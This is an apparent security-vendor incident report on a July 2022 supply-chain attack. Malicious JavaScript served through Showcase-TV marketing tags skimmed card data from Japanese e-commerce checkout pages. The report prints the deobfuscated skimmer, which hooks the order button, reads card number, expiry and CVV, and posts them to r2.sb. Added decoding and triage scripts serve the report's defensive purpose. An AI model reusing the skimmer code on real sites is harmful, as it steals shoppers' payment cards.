How a Compromised Martech Vendor Stole Credit Card Data from Nearly 60 Websites
By Vault JS | July 27, 2022
Key Takeaways
- Vault JS identified malicious JavaScript on nearly 60 websites running Showcase-TV marketing tools that was actively scraping credit card data from checkout pages. The code attached to order confirmation button clicks, captured card numbers, expiration dates, and security codes, then posted the data to an external endpoint.
- The attack exploited a trusted third-party vendor relationship, not a vulnerability in the host sites themselves. The malicious code was delivered through JavaScript hosted at navicast.jp, a legitimate marketing technology domain, making it invisible to standard security tools that whitelist known vendor scripts.
- The malicious code was obfuscated to avoid detection and ran for at least two days before being identified. Vault JS believes the vulnerability existed on at least July 25 and 26, 2022. The code has since been removed, but organizations using third-party marketing tags should audit their sites for similar injection patterns.
UPDATE: Vault JS believes that the malicious code has been removed. It appears the vulnerability existed on at least July 25 and July 26 (Pacific time).
What Did Vault JS Discover?
Since July 25, 2022, Vault JS experts have identified suspicious code on nearly 60 different websites that are running web marketing tools from Showcase-TV. These sites are currently not being supported by Vault JS and may be leaking customer data right now. If you are using Showcase-TV, you should consider removing this code temporarily until this is resolved.
How Did the Attack Work?
The issue comes from JavaScript hosted at navicast.jp. The request to r2.sb/api returns JavaScript code that behaves suspiciously, performing the following actions:
- The code attaches to an order confirmation button click event
- When the button is clicked, the code scrapes credit card information from the page
- The code then posts that information to an endpoint at r2.sb/log_api/log
The code is obfuscated to make it more difficult to uncover this activity. Below, we’ve deobfuscated the portion of the code which concerns our team. As you see, the code gathers the credit card number, expiration date month and year, and security code. It then logs this data. This example is from the payments page of the e-commerce website www.chojyu.com. In addition, our team believes the sites www.ekenkoshop.jp, fig-viper.jp, and scores of other sites have also been compromised.
```javascript
// _0x46bb68 is not defined in this excerpt.
$(document)['ready'](function() {
    var _0x4274b8 = _0x46bb68;
    // The button value 'ご注文内容の確認' means "Confirm order details".
    $('input[type=\x27submit\x27][value=\x27ご注文内容の確認\x27]')['click'](function() {
        var _0x4361d6 = _0x4274b8,
            _0x1dae2e = $("input[name='creditCardNo']")['val'](),
            _0x10a67d = $("select[name='enableMonth']")['val'](),
            _0x5606c5 = $('select[name=\x27enableYear\x27]')['val'](),
            _0x17e0f3 = $("input[name='securityCode']")['val'](),
            _0x1dae2e = btoa(encodeURIComponent(_0x1dae2e)),
            _0x10a67d = btoa(encodeURIComponent(_0x10a67d)),
            _0x5606c5 = btoa(encodeURIComponent(_0x5606c5)),
            _0x17e0f3 = btoa(encodeURIComponent(_0x17e0f3));
        $['post']('https://r2.sb/log_api/log', {
            'id': _0x1dae2e,    // cc num
            'id_m': _0x10a67d,  // month
            'id_y': _0x5606c5,  // year
            'id_c': _0x17e0f3,  // security code
            'id_f': 'chojyu.com'
        }, function(_0x51ab99) {});
    });
});
```
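For scoping exposure, the encoding used in the code above is reversible, since each field is just btoa(encodeURIComponent(value)). The following added example (not part of the original post or Vault JS tooling) decodes one captured request body, for instance from a proxy log or HAR file, and reports only masked card details. The sample body, the test card number and the site name shop.example are constructed.

```javascript
// Added example: decode a captured POST body sent to r2.sb/log_api/log.
// Field names come from the deobfuscated code above; SAMPLE_BODY is constructed
// (4111111111111111 is a well-known test card number, shop.example a placeholder).
const SAMPLE_BODY =
  'id=NDExMTExMTExMTExMTExMQ%3D%3D&id_m=MDc%3D&id_y=MjAyNQ%3D%3D&id_c=MTIz&id_f=shop.example';

// Reverse btoa(encodeURIComponent(value)); returns null on malformed input.
function decodeField(b64) {
  try {
    return decodeURIComponent(Buffer.from(b64, 'base64').toString('latin1'));
  } catch (err) {
    return null;
  }
}

// Luhn checksum, to separate plausible card numbers from junk or test probes.
function luhnValid(digits) {
  if (digits.length < 12) return false;
  let sum = 0;
  for (let i = 0; i < digits.length; i++) {
    let d = Number(digits[digits.length - 1 - i]);
    if (i % 2 === 1) d = d * 2 > 9 ? d * 2 - 9 : d * 2;
    sum += d;
  }
  return sum % 10 === 0;
}

// Summarize one exfiltrated record without writing the full PAN or CVV anywhere.
function decodeExfilBody(body) {
  const params = new URLSearchParams(body);
  const field = (name) => decodeField(params.get(name) || '') || '';
  const pan = field('id').replace(/\D/g, '');
  return {
    site: params.get('id_f'),
    panLength: pan.length,
    panLast4: pan.slice(-4),
    luhnValid: luhnValid(pan),
    expMonth: field('id_m'),
    expYear: field('id_y'),
    cvvCaptured: field('id_c').length > 0,
  };
}

console.log(decodeExfilBody(SAMPLE_BODY));
```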
What Should You Do If You Use Showcase-TV?
If your site runs Showcase-TV or any third-party marketing tools hosted on the navicast.jp domain, take the following steps immediately:
- Remove or disable the Showcase-TV tag temporarily. Until the vendor has confirmed the vulnerability is fully remediated and can provide documentation of the fix, the safest course is to pull the code from your site entirely.
- Audit your checkout and payment pages for unauthorized scripts. Review all JavaScript executing on pages where customers enter credit card data. Look for obfuscated code, unfamiliar external endpoints, or scripts attaching to form submission button click events.
- Check server logs for outbound requests to r2.sb. If your site was compromised, credit card data may have been posted to r2.sb/log_api/log. Identifying whether these requests occurred and over what timeframe will help determine the scope of exposure.
- Notify affected customers and your payment processor. If you confirm that card data was exfiltrated, initiate your breach notification process. PCI DSS requirements and applicable state or national breach notification laws will dictate specific timelines and obligations.
- Implement continuous monitoring of third-party code changes. This attack succeeded because malicious code was delivered through a trusted vendor domain. Point-in-time audits would not have caught it. Ongoing monitoring of all JavaScript executing on your site, particularly on payment pages, is the only reliable way to detect this class of supply-chain compromise.
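One way to run the audit step in the list above against each script body captured from a payment page, as an added example that is not Vault JS code. The patterns, verdict names, the vendor.example allowlist and both sample scripts are assumptions constructed for illustration.

```javascript
// Added example, not Vault JS tooling: static triage of one script body for the
// traits described in this post. Patterns, verdict names and the allowlist are
// assumptions; string matching can be evaded, so treat 'ok' as "no signal found".
const CHECKS = [
  ['reads-card-field', /creditCardNo|securityCode|card.?number|cvv|cvc/i],
  ['hooks-click-or-submit', /\b(click|submit)\b['"]?\]?\s*[(,]/],
  ['obfuscated-identifiers', /\b_0x[0-9a-f]{4,}\b/],
  ['hex-escaped-strings', /\\x[0-9a-f]{2}/i],
  ['base64-encodes-values', /\bbtoa\s*\(/],
];

function triageScript(source, allowedHosts) {
  const findings = CHECKS.filter(([, re]) => re.test(source)).map(([name]) => name);
  // Every absolute URL host in the script that is not an approved vendor host.
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    hosts.add(m[1].toLowerCase());
  }
  const unknownHosts = [...hosts].filter(
    (h) => !allowedHosts.some((a) => h === a || h.endsWith('.' + a))
  );
  // Card-field access plus an unapproved destination is the pattern seen here.
  let verdict = 'ok';
  if (findings.length >= 2) verdict = 'review';
  if (findings.includes('reads-card-field') && unknownHosts.length > 0) {
    verdict = 'investigate-now';
  }
  return { findings, unknownHosts, verdict };
}

// Constructed samples: an inert string shaped like the excerpt in this post
// (placeholder host), and an ordinary vendor snippet.
const ALLOWED = ['vendor.example'];
const SUSPECT = String.raw`$(document)['ready'](function(){var _0x4274b8=_0x46bb68;
$('input[type=\x27submit\x27]')['click'](function(){
var a=btoa(encodeURIComponent($("input[name='creditCardNo']")['val']()));
$['post']('https://collector.example/log',{'id':a});});});`;
const BENIGN = `document.querySelector('#newsletter')
  .addEventListener('click', () => fetch('https://cdn.vendor.example/subscribe'));`;

console.log(triageScript(SUSPECT, ALLOWED));
console.log(triageScript(BENIGN, ALLOWED));
```

Run it on every script response recorded from the checkout page, including scripts fetched by other scripts, since the code in this incident arrived as a second request from a trusted tag.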
Please follow our LinkedIn page for ongoing updates. In addition, you can request a free analysis of your own site to uncover any suspicious code or data leaks that might be happening right now through your third-party tags.